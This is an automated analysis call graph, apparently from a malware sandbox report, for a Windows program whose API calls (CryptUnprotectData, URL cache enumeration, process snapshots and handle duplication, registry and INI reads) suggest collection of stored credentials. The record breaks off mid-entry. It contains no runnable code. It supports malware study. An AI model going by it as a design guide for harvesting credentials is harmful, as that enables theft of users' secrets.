38838 4053fe 37 API calls 38403->38838 38406 40c813 _wcslwr 38836 40c634 47 API calls 38406->38836 38408 40c829 wcslen 38409 40c7e5 38408->38409 38409->38402 38409->38403 38835 40a706 wcslen memcpy 38409->38835 38837 40c634 47 API calls 38409->38837 38972 404363 38411->38972 38416 40b2cc 27 API calls 38417 40be02 wcslen 38416->38417 38418 40bf5d 38417->38418 38426 40be1e 38417->38426 38989 40440c 38418->38989 38419 40be26 _wcsncoll 38419->38426 38422 40be7d memset 38423 40bea7 memcpy 38422->38423 38422->38426 38424 40bf11 wcschr 38423->38424 38423->38426 38424->38426 38425 40b2cc 27 API calls 38427 40bef6 _wcsnicmp 38425->38427 38426->38418 38426->38419 38426->38422 38426->38423 38426->38424 38426->38425 38428 40bf43 LocalFree 38426->38428 38992 40bd5d 28 API calls 38426->38992 38993 404423 38426->38993 38427->38424 38427->38426 38428->38426 38429 4135f7 39005 4135e0 38429->39005 38432 40b2cc 27 API calls 38433 41360d 38432->38433 38434 40a804 8 API calls 38433->38434 38435 413613 38434->38435 38436 41363e 38435->38436 38438 40b273 27 API calls 38435->38438 38437 4135e0 FreeLibrary 38436->38437 38439 413643 38437->38439 38440 413625 38438->38440 38439->38198 38440->38436 38441 413648 38440->38441 38442 413658 38441->38442 38443 4135e0 FreeLibrary 38441->38443 38442->38198 38444 413666 38443->38444 38444->38198 38447 4136e2 38445->38447 38446 413827 38644 41366b FreeLibrary 38446->38644 38447->38446 38448 4137ac CoTaskMemFree 38447->38448 38448->38447 39008 4449b9 38449->39008 38452 444c1f 38452->38184 38453 4449b9 35 API calls 38455 444b4b 38453->38455 38454 444c15 38457 4449b9 35 API calls 38454->38457 38455->38454 39028 444972 GetVersionExW 38455->39028 38457->38452 38458 444b99 memcmp 38462 444b8c 38458->38462 38459 444c0b 39032 444a85 35 API calls 38459->39032 38462->38458 38462->38459 39029 444aa5 35 API calls 38462->39029 39030 40a7a0 GetVersionExW 38462->39030 39031 444a85 35 API calls 38462->39031 38466 40399d 38465->38466 39033 403a16 38466->39033 38468 403a09 39047 40b1ab ??3@YAXPAX ??3@YAXPAX 38468->39047 38470 403a12 wcsrchr 38470->38191 38471 4039a3 38471->38468 38474 4039f4 38471->38474 39044 40a02c CreateFileW 38471->39044 38474->38468 38475 4099c6 2 API calls 38474->38475 38475->38468 38477 414c2e 16 API calls 38476->38477 38478 404048 38477->38478 38479 414c2e 16 API calls 38478->38479 38480 404056 38479->38480 38481 409d1f 6 API calls 38480->38481 38482 404073 38481->38482 38483 409d1f 6 API calls 38482->38483 38484 40408e 38483->38484 38485 409d1f 6 API calls 38484->38485 38486 4040a6 38485->38486 38487 403af5 20 API calls 38486->38487 38488 4040ba 38487->38488 38489 403af5 20 API calls 38488->38489 38490 4040cb 38489->38490 39074 40414f memset 38490->39074 38492 4040e0 38493 404140 38492->38493 38495 4040ec memset 38492->38495 38497 4099c6 2 API calls 38492->38497 38498 40a8ab 9 API calls 38492->38498 39088 40b1ab ??3@YAXPAX ??3@YAXPAX 38493->39088 38495->38492 38496 404148 38496->38251 38497->38492 38498->38492 39101 40a6e6 WideCharToMultiByte 38499->39101 38501 4087ed 39102 4095d9 memset 38501->39102 38504 408809 memset memset memset memset memset 38505 40b2cc 27 API calls 38504->38505 38506 4088a1 38505->38506 38507 409d1f 6 API calls 38506->38507 38508 4088b1 38507->38508 38509 40b2cc 27 API calls 38508->38509 38510 4088c0 38509->38510 38511 409d1f 6 API calls 38510->38511 38512 4088d0 38511->38512 38513 40b2cc 27 API calls 38512->38513 38514 4088df 38513->38514 38515 409d1f 6 API calls 38514->38515 38516 4088ef 38515->38516 38517 40b2cc 27 API calls 38516->38517 38518 4088fe 38517->38518 38519 409d1f 6 API calls 38518->38519 38520 40890e 38519->38520 38521 40b2cc 27 API calls 38520->38521 38522 40891d 38521->38522 38523 409d1f 6 API calls 38522->38523 38524 40892d 38523->38524 39119 409b98 GetFileAttributesW 38524->39119 38526 40893e 38527 408943 38526->38527 38528 408958 38526->38528 39120 407fdf 75 API calls 38527->39120 39121 409b98 GetFileAttributesW 38528->39121 38531 408964 38532 408969 38531->38532 38533 40897b 38531->38533 39122 4082c7 198 API calls 38532->39122 39123 409b98 GetFileAttributesW 38533->39123 38536 408953 38536->38251 38537 408987 38538 4089a1 38537->38538 38539 40898c 38537->38539 39125 409b98 GetFileAttributesW 38538->39125 39124 408560 29 API calls 38539->39124 38542 4089ad 38543 4089b2 38542->38543 38544 4089c7 38542->38544 39126 408560 29 API calls 38543->39126 39127 409b98 GetFileAttributesW 38544->39127 38547 4089d3 38547->38536 38548 4089d8 38547->38548 39128 408560 29 API calls 38548->39128 38551 40b633 ??3@YAXPAX 38550->38551 38552 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38551->38552 38553 413f00 Process32NextW 38552->38553 38554 413da5 OpenProcess 38553->38554 38555 413f17 CloseHandle 38553->38555 38556 413df3 memset 38554->38556 38559 413eb0 38554->38559 38555->38294 39151 413f27 38556->39151 38558 413ebf ??3@YAXPAX 38558->38559 38559->38553 38559->38558 38560 4099f4 3 API calls 38559->38560 38560->38559 38561 413e37 GetModuleHandleW 38563 413e46 38561->38563 38565 413e1f 38561->38565 38563->38565 38564 413e6a QueryFullProcessImageNameW 38564->38565 38565->38561 38565->38564 39156 413959 38565->39156 39172 413ca4 38565->39172 38567 413ea2 CloseHandle 38567->38559 38569 414c2e 16 API calls 38568->38569 38570 403eb7 38569->38570 38571 414c2e 16 API calls 38570->38571 38572 403ec5 38571->38572 38573 409d1f 6 API calls 38572->38573 38574 403ee2 38573->38574 38575 409d1f 6 API calls 38574->38575 38576 403efd 38575->38576 38577 409d1f 6 API calls 38576->38577 38578 403f15 38577->38578 38579 403af5 20 API calls 38578->38579 38580 403f29 38579->38580 38581 403af5 20 API calls 38580->38581 38582 403f3a 38581->38582 38583 40414f 33 API calls 38582->38583 38589 403f4f 38583->38589 38584 403faf 39185 40b1ab ??3@YAXPAX ??3@YAXPAX 38584->39185 38585 403f5b memset 38585->38589 38587 403fb7 38587->38233 38588 4099c6 2 API calls 38588->38589 38589->38584 38589->38585 38589->38588 38590 40a8ab 9 API calls 38589->38590 38590->38589 38592 414c2e 16 API calls 38591->38592 38593 403d26 38592->38593 38594 414c2e 16 API calls 38593->38594 38595 403d34 38594->38595 38596 409d1f 6 API calls 38595->38596 38597 403d51 38596->38597 38598 409d1f 6 API calls 38597->38598 38599 403d6c 38598->38599 38600 409d1f 6 API calls 38599->38600 38601 403d84 38600->38601 38602 403af5 20 API calls 38601->38602 38603 403d98 38602->38603 38604 403af5 20 API calls 38603->38604 38605 403da9 38604->38605 38606 40414f 33 API calls 38605->38606 38612 403dbe 38606->38612 38607 403e1e 39186 40b1ab ??3@YAXPAX ??3@YAXPAX 38607->39186 38608 403dca memset 38608->38612 38610 403e26 38610->38249 38611 4099c6 2 API calls 38611->38612 38612->38607 38612->38608 38612->38611 38613 40a8ab 9 API calls 38612->38613 38613->38612 38615 414b81 8 API calls 38614->38615 38616 414c40 38615->38616 38617 414c73 memset 38616->38617 39187 409cea 38616->39187 38619 414c94 38617->38619 39190 414592 RegOpenKeyExW 38619->39190 38621 414c64 SHGetSpecialFolderPathW 38623 414d0b 38621->38623 38623->38253 38624 414cc1 38625 414cf4 wcscpy 38624->38625 39191 414bb0 wcscpy 38624->39191 38625->38623 38627 414cd2 39192 4145ac RegQueryValueExW 38627->39192 38629 414ce9 RegCloseKey 38629->38625 38631 409d62 38630->38631 38632 409d43 wcscpy 38630->38632 38635 445389 38631->38635 38633 409719 2 API calls 38632->38633 38634 409d51 wcscat 38633->38634 38634->38631 38636 40ae18 9 API calls 38635->38636 38637 4453c4 38636->38637 38638 40ae51 9 API calls 38637->38638 38639 4453f3 38637->38639 38640 40add4 2 API calls 38637->38640 38643 445403 250 API calls 38637->38643 38638->38637 38641 40aebe FindClose 38639->38641 38640->38637 38642 4453fe 38641->38642 38642->38301 38643->38637 38644->38205 38645->38297 38646->38281 38647->38281 38648->38311 38650 409c89 38649->38650 38650->38336 38651->38365 38653 413d39 38652->38653 38654 413d2f FreeLibrary 38652->38654 38655 40b633 ??3@YAXPAX 38653->38655 38654->38653 38656 413d42 38655->38656 38657 40b633 ??3@YAXPAX 38656->38657 38658 413d4a 38657->38658 38658->38327 38659->38234 38660->38241 38661->38263 38663 44db70 38662->38663 38664 40b6fc memset 38663->38664 38665 409c70 2 API calls 38664->38665 38666 40b732 wcsrchr 38665->38666 38667 40b743 38666->38667 38668 40b746 memset 38666->38668 38667->38668 38669 40b2cc 27 API calls 38668->38669 38670 40b76f 38669->38670 38671 409d1f 6 API calls 38670->38671 38672 40b783 38671->38672 39193 409b98 GetFileAttributesW 38672->39193 38674 40b792 38676 409c70 2 API calls 38674->38676 38688 40b7c2 38674->38688 38678 40b7a5 38676->38678 38681 40b2cc 27 API calls 38678->38681 38679 40b837 CloseHandle 38683 40b83e memset 38679->38683 38680 40b817 39277 409a45 GetTempPathW 38680->39277 38684 40b7b2 38681->38684 39227 40a6e6 WideCharToMultiByte 38683->39227 38685 409d1f 6 API calls 38684->38685 38685->38688 38686 40b827 38686->38683 39194 40bb98 38688->39194 38689 40b866 39228 444432 38689->39228 38692 40bad5 38695 40b04b ??3@YAXPAX 38692->38695 38693 40b273 27 API calls 38694 40b89a 38693->38694 39274 438552 38694->39274 38697 40baf3 38695->38697 38697->38274 38699 40bacd 39308 443d90 110 API calls 38699->39308 38702 40bac6 39307 424f26 122 API calls 38702->39307 38703 40b8bd memset 39298 425413 17 API calls 38703->39298 38706 425413 17 API calls 38724 40b8b8 38706->38724 38709 40a71b MultiByteToWideChar 38709->38724 38710 40a734 MultiByteToWideChar 38710->38724 38713 40b9b5 memcmp 38713->38724 38714 4099c6 2 API calls 38714->38724 38715 404423 37 API calls 38715->38724 38718 4251c4 136 API calls 38718->38724 38719 40bb3e memset memcpy 39309 40a734 MultiByteToWideChar 38719->39309 38721 40bb88 LocalFree 38721->38724 38724->38702 38724->38703 38724->38706 38724->38709 38724->38710 38724->38713 38724->38714 38724->38715 38724->38718 38724->38719 38725 40ba5f memcmp 38724->38725 39299 4253ef 16 API calls 38724->39299 39300 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38724->39300 39301 4253af 17 API calls 38724->39301 39302 4253cf 17 API calls 38724->39302 39303 447280 memset 38724->39303 39304 447960 memset memcpy memcpy memcpy 38724->39304 39305 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38724->39305 39306 447920 memcpy memcpy memcpy 38724->39306 38725->38724 38726->38276 38728 40aebe FindClose 38727->38728 38729 40ae21 38728->38729 38730 4099c6 2 API calls 38729->38730 38731 40ae35 38730->38731 38732 409d1f 6 API calls 38731->38732 38733 40ae49 38732->38733 38733->38340 38735 40ade0 38734->38735 38736 40ae0f 38734->38736 38735->38736 38737 40ade7 wcscmp 38735->38737 38736->38340 38737->38736 38738 40adfe wcscmp 38737->38738 38738->38736 38740 40ae7b FindNextFileW 38739->38740 38741 40ae5c FindFirstFileW 38739->38741 38742 40ae94 38740->38742 38743 40ae8f 38740->38743 38741->38742 38745 40aeb6 38742->38745 38746 409d1f 6 API calls 38742->38746 38744 40aebe FindClose 38743->38744 38744->38742 38745->38340 38746->38745 38748 40aed1 38747->38748 38749 40aec7 FindClose 38747->38749 38748->38202 38749->38748 38751 4099d7 38750->38751 38752 4099da memcpy 38750->38752 38751->38752 38752->38259 38754 40b2cc 27 API calls 38753->38754 38755 44543f 38754->38755 38756 409d1f 6 API calls 38755->38756 38757 44544f 38756->38757 39667 409b98 GetFileAttributesW 38757->39667 38759 44545e 38760 445476 38759->38760 38761 40b6ef 249 API calls 38759->38761 38762 40b2cc 27 API calls 38760->38762 38761->38760 38763 445482 38762->38763 38764 409d1f 6 API calls 38763->38764 38765 445492 38764->38765 39668 409b98 GetFileAttributesW 38765->39668 38767 4454a1 38768 4454b9 38767->38768 38769 40b6ef 249 API calls 38767->38769 38768->38279 38769->38768 38770->38278 38771->38302 38772->38308 38773->38343 38774->38323 38775->38373 38776->38373 38777->38354 38778->38384 38779->38386 38780->38388 38782 414c2e 16 API calls 38781->38782 38783 40c2ae 38782->38783 38839 40c1d3 38783->38839 38788 40c3be 38805 40a8ab 38788->38805 38789 40afcf 2 API calls 38790 40c2fd FindFirstUrlCacheEntryW 38789->38790 38791 40c3b6 38790->38791 38792 40c31e wcschr 38790->38792 38793 40b04b ??3@YAXPAX 38791->38793 38794 40c331 38792->38794 38795 40c35e FindNextUrlCacheEntryW 38792->38795 38793->38788 38797 40a8ab 9 API calls 38794->38797 38795->38792 38796 40c373 GetLastError 38795->38796 38798 40c3ad FindCloseUrlCache 38796->38798 38799 40c37e 38796->38799 38800 40c33e wcschr 38797->38800 38798->38791 38801 40afcf 2 API calls 38799->38801 38800->38795 38802 40c34f 38800->38802 38803 40c391 FindNextUrlCacheEntryW 38801->38803 38804 40a8ab 9 API calls 38802->38804 38803->38792 38803->38798 38804->38795 38933 40a97a 38805->38933 38808 40a8cc 38808->38395 38809 40a8d0 7 API calls 38809->38808 38938 40b1ab ??3@YAXPAX ??3@YAXPAX 38810->38938 38812 40c3dd 38813 40b2cc 27 API calls 38812->38813 38814 40c3e7 38813->38814 38939 414592 RegOpenKeyExW 38814->38939 38816 40c3f4 38817 40c50e 38816->38817 38818 40c3ff 38816->38818 38832 405337 38817->38832 38819 40a9ce 4 API calls 38818->38819 38820 40c418 memset 38819->38820 38940 40aa1d 38820->38940 38823 40c471 38825 40c47a _wcsupr 38823->38825 38824 40c505 RegCloseKey 38824->38817 38826 40a8d0 7 API calls 38825->38826 38827 40c498 38826->38827 38828 40a8d0 7 API calls 38827->38828 38829 40c4ac memset 38828->38829 38830 40aa1d 38829->38830 38831 40c4e4 RegEnumValueW 38830->38831 38831->38824 38831->38825 38942 405220 38832->38942 38834 405340 38834->38409 38835->38406 38836->38408 38837->38409 38838->38402 38840 40ae18 9 API calls 38839->38840 38846 40c210 38840->38846 38841 40ae51 9 API calls 38841->38846 38842 40c264 38843 40aebe FindClose 38842->38843 38845 40c26f 38843->38845 38844 40add4 2 API calls 38844->38846 38851 40e5ed memset memset 38845->38851 38846->38841 38846->38842 38846->38844 38847 40c231 _wcsicmp 38846->38847 38848 40c1d3 34 API calls 38846->38848 38847->38846 38849 40c248 38847->38849 38848->38846 38864 40c084 21 API calls 38849->38864 38852 414c2e 16 API calls 38851->38852 38853 40e63f 38852->38853 38854 409d1f 6 API calls 38853->38854 38855 40e658 38854->38855 38865 409b98 GetFileAttributesW 38855->38865 38857 40e667 38858 409d1f 6 API calls 38857->38858 38860 40e680 38857->38860 38858->38860 38866 409b98 GetFileAttributesW 38860->38866 38861 40e68f 38862 40c2d8 38861->38862 38867 40e4b2 38861->38867 38862->38788 38862->38789 38864->38846 38865->38857 38866->38861 38888 40e01e 38867->38888 38869 40e593 38870 40e5b0 38869->38870 38871 40e59c DeleteFileW 38869->38871 38872 40b04b ??3@YAXPAX 38870->38872 38871->38870 38874 40e5bb 38872->38874 38873 40e521 38873->38869 38911 40e175 38873->38911 38876 40e5c4 CloseHandle 38874->38876 38877 40e5cc 38874->38877 38876->38877 38879 40b633 ??3@YAXPAX 38877->38879 38878 40e573 38880 40e584 38878->38880 38881 40e57c CloseHandle 38878->38881 38882 40e5db 38879->38882 38932 40b1ab ??3@YAXPAX ??3@YAXPAX 38880->38932 38881->38880 38883 40b633 ??3@YAXPAX 38882->38883 38885 40e5e3 38883->38885 38885->38862 38887 40e540 38887->38878 38931 40e2ab 30 API calls 38887->38931 38889 406214 22 API calls 38888->38889 38890 40e03c 38889->38890 38891 40e16b 38890->38891 38892 40dd85 60 API calls 38890->38892 38891->38873 38893 40e06b 38892->38893 38893->38891 38894 40afcf ??2@YAPAXI ??3@YAXPAX 38893->38894 38895 40e08d OpenProcess 38894->38895 38896 40e0a4 GetCurrentProcess DuplicateHandle 38895->38896 38900 40e152 38895->38900 38897 40e0d0 GetFileSize 38896->38897 38898 40e14a CloseHandle 38896->38898 38901 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38897->38901 38898->38900 38899 40e160 38903 40b04b ??3@YAXPAX 38899->38903 38900->38899 38902 406214 22 API calls 38900->38902 38904 40e0ea 38901->38904 38902->38899 38903->38891 38905 4096dc CreateFileW 38904->38905 38906 40e0f1 CreateFileMappingW 38905->38906 38907 40e140 CloseHandle CloseHandle 38906->38907 38908 40e10b MapViewOfFile 38906->38908 38907->38898 38909 40e13b CloseHandle 38908->38909 38910 40e11f WriteFile UnmapViewOfFile 38908->38910 38909->38907 38910->38909 38912 40e18c 38911->38912 38913 406b90 11 API calls 38912->38913 38914 40e19f 38913->38914 38915 40e1a7 memset 38914->38915 38916 40e299 38914->38916 38921 40e1e8 38915->38921 38917 4069a3 ??3@YAXPAX ??3@YAXPAX 38916->38917 38918 40e2a4 38917->38918 38918->38887 38919 406e8f 13 API calls 38919->38921 38920 406b53 SetFilePointerEx ReadFile 38920->38921 38921->38919 38921->38920 38922 40dd50 _wcsicmp 38921->38922 38923 40e283 38921->38923 38927 40742e 8 API calls 38921->38927 38928 40aae3 wcslen wcslen _memicmp 38921->38928 38929 40e244 _snwprintf 38921->38929 38922->38921 38924 40e291 38923->38924 38925 40e288 ??3@YAXPAX 38923->38925 38926 40aa04 ??3@YAXPAX 38924->38926 38925->38924 38926->38916 38927->38921 38928->38921 38930 40a8d0 7 API calls 38929->38930 38930->38921 38931->38887 38932->38869 38935 40a980 38933->38935 38934 40a8bb 38934->38808 38934->38809 38935->38934 38936 40a995 _wcsicmp 38935->38936 38937 40a99c wcscmp 38935->38937 38936->38935 38937->38935 38938->38812 38939->38816 38941 40aa23 RegEnumValueW 38940->38941 38941->38823 38941->38824 38943 40522a 38942->38943 38968 405329 38942->38968 38944 40b2cc 27 API calls 38943->38944 38945 405234 38944->38945 38946 40a804 8 API calls 38945->38946 38947 40523a 38946->38947 38969 40b273 38947->38969 38949 405248 _mbscpy _mbscat 38950 40526c 38949->38950 38951 40b273 27 API calls 38950->38951 38952 405279 38951->38952 38953 40b273 27 API calls 38952->38953 38954 40528f 38953->38954 38955 40b273 27 API calls 38954->38955 38956 4052a5 38955->38956 38957 40b273 27 API calls 38956->38957 38958 4052bb 38957->38958 38959 40b273 27 API calls 38958->38959 38960 4052d1 38959->38960 38961 40b273 27 API calls 38960->38961 38962 4052e7 38961->38962 38963 40b273 27 API calls 38962->38963 38964 4052fd 38963->38964 38965 40b273 27 API calls 38964->38965 38966 405313 38965->38966 38967 40b273 27 API calls 38966->38967 38967->38968 38968->38834 38970 40b58d 27 API calls 38969->38970 38971 40b18c 38970->38971 38971->38949 38973 40440c FreeLibrary 38972->38973 38974 40436d 38973->38974 38975 40a804 8 API calls 38974->38975 38976 404377 38975->38976 38977 4043f7 38976->38977 38978 40b273 27 API calls 38976->38978 38977->38416 38977->38418 38979 40438d 38978->38979 38980 40b273 27 API calls 38979->38980 38981 4043a7 38980->38981 38982 40b273 27 API calls 38981->38982 38983 4043ba 38982->38983 38984 40b273 27 API calls 38983->38984 38985 4043ce 38984->38985 38986 40b273 27 API calls 38985->38986 38987 4043e2 38986->38987 38987->38977 38988 40440c FreeLibrary 38987->38988 38988->38977 38990 404413 FreeLibrary 38989->38990 38991 40441e 38989->38991 38990->38991 38991->38429 38992->38426 38994 40447e 38993->38994 38995 40442e 38993->38995 38996 404485 CryptUnprotectData 38994->38996 38997 40449c 38994->38997 38998 40b2cc 27 API calls 38995->38998 38996->38997 38997->38426 38999 404438 38998->38999 39000 40a804 8 API calls 38999->39000 39001 40443e 39000->39001 39002 40444f 39001->39002 39003 40b273 27 API calls 39001->39003 39002->38994 39004 404475 FreeLibrary 39002->39004 39003->39002 39004->38994 39006 4135f6 39005->39006 39007 4135eb FreeLibrary 39005->39007 39006->38432 39007->39006 39009 4449c4 39008->39009 39027 444a48 39008->39027 39010 40b2cc 27 API calls 39009->39010 39011 4449cb 39010->39011 39012 40a804 8 API calls 39011->39012 39013 4449d1 39012->39013 39014 40b273 27 API calls 39013->39014 39015 4449dc 39014->39015 39016 40b273 27 API calls 39015->39016 39017 4449f3 39016->39017 39018 40b273 27 API calls 39017->39018 39019 444a04 39018->39019 39020 40b273 27 API calls 39019->39020 39021 444a15 39020->39021 39022 40b273 27 API calls 39021->39022 39023 444a26 39022->39023 39024 40b273 27 API calls 39023->39024 39025 444a37 39024->39025 39026 40b273 27 API calls 39025->39026 39026->39027 39027->38452 39027->38453 39028->38462 39029->38462 39030->38462 39031->38462 39032->38454 39034 403a29 39033->39034 39048 403bed memset memset 39034->39048 39036 403ae7 39061 40b1ab ??3@YAXPAX ??3@YAXPAX 39036->39061 39037 403a3f memset 39041 403a2f 39037->39041 39039 403aef 39039->38471 39040 409d1f 6 API calls 39040->39041 39041->39036 39041->39037 39041->39040 39042 409b98 GetFileAttributesW 39041->39042 39043 40a8d0 7 API calls 39041->39043 39042->39041 39043->39041 39045 40a051 GetFileTime CloseHandle 39044->39045 39046 4039ca CompareFileTime 39044->39046 39045->39046 39046->38471 39047->38470 39049 414c2e 16 API calls 39048->39049 39050 403c38 39049->39050 39051 409719 2 API calls 39050->39051 39052 403c3f wcscat 39051->39052 39053 414c2e 16 API calls 39052->39053 39054 403c61 39053->39054 39055 409719 2 API calls 39054->39055 39056 403c68 wcscat 39055->39056 39062 403af5 39056->39062 39059 403af5 20 API calls 39060 403c95 39059->39060 39060->39041 39061->39039 39063 403b02 39062->39063 39064 40ae18 9 API calls 39063->39064 39073 403b37 39064->39073 39065 403bdb 39067 40aebe FindClose 39065->39067 39066 40add4 wcscmp wcscmp 39066->39073 39068 403be6 39067->39068 39068->39059 39069 40a8d0 7 API calls 39069->39073 39070 40ae18 9 API calls 39070->39073 39071 40ae51 9 API calls 39071->39073 39072 40aebe FindClose 39072->39073 39073->39065 39073->39066 39073->39069 39073->39070 39073->39071 39073->39072 39075 409d1f 6 API calls 39074->39075 39076 404190 39075->39076 39089 409b98 GetFileAttributesW 39076->39089 39078 40419c 39079 4041a7 6 API calls 39078->39079 39080 40435c 39078->39080 39081 40424f 39079->39081 39080->38492 39081->39080 39083 40425e memset 39081->39083 39085 409d1f 6 API calls 39081->39085 39086 40a8ab 9 API calls 39081->39086 39090 414842 39081->39090 39083->39081 39084 404296 wcscpy 39083->39084 39084->39081 39085->39081 39087 4042b6 memset memset _snwprintf wcscpy 39086->39087 39087->39081 39088->38496 39089->39078 39093 41443e 39090->39093 39092 414866 39092->39081 39094 41444b 39093->39094 39095 414451 39094->39095 39096 4144a3 GetPrivateProfileStringW 39094->39096 39097 414491 39095->39097 39098 414455 wcschr 39095->39098 39096->39092 39100 414495 WritePrivateProfileStringW 39097->39100 39098->39097 39099 414463 _snwprintf 39098->39099 39099->39100 39100->39092 39101->38501 39103 40b2cc 27 API calls 39102->39103 39104 409615 39103->39104 39105 409d1f 6 API calls 39104->39105 39106 409625 39105->39106 39129 409b98 GetFileAttributesW 39106->39129 39108 409634 39109 409648 39108->39109 39146 4091b8 238 API calls 39108->39146 39111 40b2cc 27 API calls 39109->39111 39113 408801 39109->39113 39112 40965d 39111->39112 39114 409d1f 6 API calls 39112->39114 39113->38504 39113->38536 39115 40966d 39114->39115 39130 409b98 GetFileAttributesW 39115->39130 39117 40967c 39117->39113 39131 409529 39117->39131 39119->38526 39120->38536 39121->38531 39122->38536 39123->38537 39124->38538 39125->38542 39126->38544 39127->38547 39128->38536 39129->39108 39130->39117 39147 4096c3 CreateFileW 39131->39147 39133 409543 39134 4095cd 39133->39134 39135 409550 GetFileSize 39133->39135 39134->39113 39136 409577 CloseHandle 39135->39136 39137 40955f 39135->39137 39136->39134 39142 409585 39136->39142 39138 40afcf 2 API calls 39137->39138 39139 409569 39138->39139 39148 40a2ef ReadFile 39139->39148 39141 409574 39141->39136 39142->39134 39143 4095c3 39142->39143 39149 408b8d 38 API calls 39142->39149 39150 40908b 55 API calls 39143->39150 39146->39109 39147->39133 39148->39141 39149->39142 39150->39134 39178 413f4f 39151->39178 39154 413f37 K32GetModuleFileNameExW 39155 413f4a 39154->39155 39155->38565 39157 413969 wcscpy 39156->39157 39158 41396c wcschr 39156->39158 39170 413a3a 39157->39170 39158->39157 39160 41398e 39158->39160 39182 4097f7 wcslen wcslen _memicmp 39160->39182 39162 41399a 39163 4139a4 memset 39162->39163 39164 4139e6 39162->39164 39183 409dd5 GetWindowsDirectoryW wcscpy 39163->39183 39166 413a31 wcscpy 39164->39166 39167 4139ec memset 39164->39167 39166->39170 39184 409dd5 GetWindowsDirectoryW wcscpy 39167->39184 39168 4139c9 wcscpy wcscat 39168->39170 39170->38565 39171 413a11 memcpy wcscat 39171->39170 39173 413cb0 GetModuleHandleW 39172->39173 39174 413cda 39172->39174 39173->39174 39175 413cbf 39173->39175 39176 413ce3 GetProcessTimes 39174->39176 39177 413cf6 39174->39177 39175->39174 39176->38567 39177->38567 39179 413f54 39178->39179 39181 413f2f 39178->39181 39180 40a804 8 API calls 39179->39180 39180->39181 39181->39154 39181->39155 39182->39162 39183->39168 39184->39171 39185->38587 39186->38610 39188 409cf9 GetVersionExW 39187->39188 39189 409d0a 39187->39189 39188->39189 39189->38617 39189->38621 39190->38624 39191->38627 39192->38629 39193->38674 39195 40bba5 39194->39195 39310 40cc26 39195->39310 39198 40bd4b 39331 40cc0c 39198->39331 39203 40b2cc 27 API calls 39204 40bbef 39203->39204 39338 40ccf0 _wcsicmp 39204->39338 39206 40bbf5 39206->39198 39339 40ccb4 6 API calls 39206->39339 39208 40bc26 39209 40cf04 17 API calls 39208->39209 39210 40bc2e 39209->39210 39211 40bd43 39210->39211 39212 40b2cc 27 API calls 39210->39212 39213 40cc0c 4 API calls 39211->39213 39214 40bc40 39212->39214 39213->39198 39340 40ccf0 _wcsicmp 39214->39340 39216 40bc46 39216->39211 39217 40bc61 memset memset WideCharToMultiByte 39216->39217 39341 40103c strlen 39217->39341 39219 40bcc0 39220 40b273 27 API calls 39219->39220 39221 40bcd0 memcmp 39220->39221 39221->39211 39222 40bce2 39221->39222 39223 404423 37 API calls 39222->39223 39224 40bd10 39223->39224 39224->39211 39225 40bd3a LocalFree 39224->39225 39226 40bd1f memcpy 39224->39226 39225->39211 39226->39225 39227->38689 39401 4438b5 39228->39401 39230 44444c 39231 40b879 39230->39231 39415 415a6d 39230->39415 39231->38692 39231->38693 39234 444486 39236 4444b9 memcpy 39234->39236 39273 4444a4 39234->39273 39235 44469e 39235->39231 39466 443d90 110 API calls 39235->39466 39419 415258 39236->39419 39239 444524 39240 444541 39239->39240 39241 44452a 39239->39241 39422 444316 39240->39422 39456 416935 16 API calls 39241->39456 39245 444316 18 API calls 39246 444563 39245->39246 39247 444316 18 API calls 39246->39247 39248 44456f 39247->39248 39249 444316 18 API calls 39248->39249 39250 44457f 39249->39250 39250->39273 39436 432d4e 39250->39436 39253 444316 18 API calls 39254 4445b0 39253->39254 39440 41eed2 39254->39440 39256 4445cf 39257 4445d6 39256->39257 39258 4445ee 39256->39258 39457 416935 16 API calls 39257->39457 39458 43302c memset 39258->39458 39260 4445fa 39459 43302c memset 39260->39459 39263 444609 39263->39273 39460 416935 16 API calls 39263->39460 39265 444646 39461 434d4b 17 API calls 39265->39461 39267 44464d 39462 437655 16 API calls 39267->39462 39269 444653 39463 4442e6 11 API calls 39269->39463 39271 44465d 39271->39273 39464 416935 16 API calls 39271->39464 39465 4442e6 11 API calls 39273->39465 39504 438460 39274->39504 39276 40b8a4 39276->38699 39280 4251c4 39276->39280 39278 409a74 GetTempFileNameW 39277->39278 39279 409a66 GetWindowsDirectoryW 39277->39279 39278->38686 39279->39278 39601 424f07 11 API calls 39280->39601 39282 4251e4 39283 4251f7 39282->39283 39284 4251e8 39282->39284 39603 4250f8 39283->39603 39602 4446ea 11 API calls 39284->39602 39286 4251f2 39286->38724 39288 425209 39291 425249 39288->39291 39294 4250f8 126 API calls 39288->39294 39295 425287 39288->39295 39611 4384e9 134 API calls 39288->39611 39612 424f74 123 API calls 39288->39612 39291->39295 39613 424ff0 13 API calls 39291->39613 39294->39288 39615 415c7d 16 API calls 39295->39615 39296 425266 39296->39295 39614 415be9 memcpy 39296->39614 39298->38724 39299->38724 39300->38724 39301->38724 39302->38724 39303->38724 39304->38724 39305->38724 39306->38724 39307->38699 39308->38692 39309->38721 39342 4096c3 CreateFileW 39310->39342 39312 40cc34 39313 40cc3d GetFileSize 39312->39313 39314 40bbca 39312->39314 39315 40afcf 2 API calls 39313->39315 39314->39198 39322 40cf04 39314->39322 39316 40cc64 39315->39316 39343 40a2ef ReadFile 39316->39343 39318 40cc71 39344 40ab4a MultiByteToWideChar 39318->39344 39320 40cc95 CloseHandle 39321 40b04b ??3@YAXPAX 39320->39321 39321->39314 39323 40b633 ??3@YAXPAX 39322->39323 39324 40cf14 39323->39324 39350 40b1ab ??3@YAXPAX ??3@YAXPAX 39324->39350 39326 40bbdd 39326->39198 39326->39203 39327 40cf1b 39327->39326 39329 40cfef 39327->39329 39351 40cd4b 39327->39351 39330 40cd4b 14 API calls 39329->39330 39330->39326 39332 40b633 ??3@YAXPAX 39331->39332 39333 40cc15 39332->39333 39334 40aa04 ??3@YAXPAX 39333->39334 39335 40cc1d 39334->39335 39400 40b1ab ??3@YAXPAX ??3@YAXPAX 39335->39400 39337 40b7d4 memset CreateFileW 39337->38679 39337->38680 39338->39206 39339->39208 39340->39216 39341->39219 39342->39312 39343->39318 39345 40ab6b 39344->39345 39349 40ab93 39344->39349 39346 40a9ce 4 API calls 39345->39346 39347 40ab74 39346->39347 39348 40ab7c MultiByteToWideChar 39347->39348 39348->39349 39349->39320 39350->39327 39352 40cd7b 39351->39352 39385 40aa29 39352->39385 39354 